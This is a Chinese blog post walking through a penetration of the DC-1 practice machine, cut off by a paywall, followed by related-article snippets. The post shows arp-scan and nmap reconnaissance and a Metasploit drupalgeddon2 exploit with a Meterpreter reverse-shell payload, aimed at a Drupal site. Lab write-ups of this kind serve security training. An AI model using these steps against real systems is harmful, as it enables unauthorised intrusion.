DC-1内网靶机渗透

最新推荐文章于 2024-05-06 13:38:33 发布
最新推荐文章于 2024-05-06 13:38:33 发布
阅读量509 收藏 2
点赞数
分类专栏: 靶机渗透 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42373409/article/details/112525925
版权

DC-1内网靶机渗透

实验环境:
靶机:DC-1
渗透机:kali 2020;
实验内容:
首先下载并启动我们的靶机;
在这里插入图片描述1.由于我们进行内网渗透,并且不知道靶机的IP地址,所以我们先进行arp扫描,确定靶机IP地址,arp扫描命令为:arp-scan -l

在这里插入图片描述2.确定了我们靶机的IP地址为192.168.131.136之后,首先要考虑的是它开放了那些端口提供了哪些服务,所以首选用nmap工具进行扫描开放端口
命令:nmap -A 192.168.131.136
在这里插入图片描述3.用namp扫描之后,我们发现靶机开放了22、80、111等端口,看到80端口开放,我们当然要从网页访问一下看看是什么页面,所以从浏览器访问一下靶机IP。
在这里插入图片描述4.发现靶机是用Drupal搭建的站点,所以我们想到利用msf中搜索一下Drupal,看是否具有可利用的exp;
命令:启动msf msfconsole
搜索exp search Drupal
在这里插入图片描述5.经测试使用第四个exp可以攻击,成功拿shell;(直接写利用第四个exp的步骤)
5.1 利用exp;

msf5 > use 4
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

5.2 看一下需要为exp配置那些参数 并配置

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   --
最低0.47元/天 解锁文章
huihui_zyh
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-1靶机渗透
m0_62008601的博客
04-28 3584
攻击机:kali IP:192.168.56.102 靶机DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)络设置的是仅主机络 kali是在VMware里的,络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
DC-1靶机渗透测试记录
qq_33163046的博客
12-18 9509
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,络连接方式仅主机(Host-Only)络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。 ┌──(root??kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:83:c
Linux最新内渗透总结——红日靶场①_红日靶机账号密码(1),2024-2024历年易跳动Linux运维面试真题解析
最新发布
2401_83944596的博客
05-06 844
​​​​。
web安全渗透之钓鱼站提权
kali_Ma的博客
11-12 4344
要生成一个钓鱼址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从上找到,也不安全。
【内渗透】记一次靶机实战
kali_Ma的博客
11-24 1516
靶机难度属于中等靶机水平,全文思路就是信息收集,使用nmap或者masscan进行端口扫描,访问web页面,发现提示,接着使用wfuzz进行指定路径fuzz。然后找到py脚本,接着进行脚本分析,发现脚本存在的漏洞。构造poc然后进行反弹shell,反弹shell之后,发现存在另一个新的脚本,存在密码加密方式和密码本。进行解密,解密之后使用ssh进行远程登录。使用sudo -l发现xx路径下的python脚本拥有root权限,接着进行移动该目录写入提权语法成功提权。
的一些基础知识
xiaoxiongjieluo的博客
02-12 841
工作组
DC-1靶机渗透
applekelly的博客
03-28 88
主机扫描,扫描主机IP查看靶机mac地址,从而查询IP22端口和80端口是我们的突破口,访问页查看站点信息,也可以自行判断,页一看就是cms就是drupal也可以用kalli自带的工whatweb扫描可以扫出cms,然后再用dirb工具扫一下站目录还是扫出了很多目录,咱们先放一放暂时得到了以下信息CMS是Drupal Apache 2.2.22PHP 5.4.45。
DC-1渗透靶机详解
weixin_51083551的博客
07-18 2824
萌新DC系列靶机渗透详解之DC-1 在渗透测试之前,有自己的渗透思路 1. 明确目标 我们的目标应该是找齐里面所有的 flag 根据每个 flag 的提示找到下一个 flag 2. 信息收集 使用扫描工具寻找目标ip,在同一个段下使用 arp-scan 扫描即可 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with 256
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
【漏洞利用框架】Metasploit基本使用
ssrf
09-28 3789
文章目录一、Metasploit 是什么?二、使用Metasploit框架的基本步骤三、msfvenom工具1、生成木马后门2、对 Payload 进行编码3、漏洞利用四、漏洞攻击流程1、搜索攻击模块2、进入模块3、查看模块所需参数4、设置配置参数5、查询该模块下的payload6、设置payload7、启动服务五、永恒之蓝六、meterpreter 会话管理七、免杀八、木马混淆 一、Metasploit 是什么? Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 2808
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
wordpress获取登录权限后获取shell的方法
墨痕诉清风的博客
09-03 2015
当获取wordpress登录凭证后,获取shell的方法。运行后目录下会自动生成一个zip文件并启动了msf监听。插件要按wordpress的格式写才会被上传成功。这里做一个php.zip的文件进行上传。利用现有的代码文件进行修改。最终得到的访问路径拼装得到。添加自己的shell代码。如图所示点击插件进行上传。这里要主要右上角的名称。访问即可获取shell。再压缩一次上传又失败了。设置 PASSWORD。设置 USERNAME。
kali-msfconsole:演示-浏览器缓冲区溢出攻击
xianjie0318的博客
12-10 1908
测试机:windows7 32位 测试步骤: 准备Win7-X86并安装Flash18 如果安装提示不是最新版本,需要去注册表-删除HKEY—LOCAL—MACHINE\SOFTWARE\Macromedia\flashplayer\safeversions 中18以及以上的版本 安装后运行命令msfconsole msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf [*] No payload configure.
msf下的各种生成payload命令
热门推荐
qk的专栏
12-21 1万+
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
利用Metasploit对PHP5.2.4渗透测试提权
渗透测试
05-06 1642
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值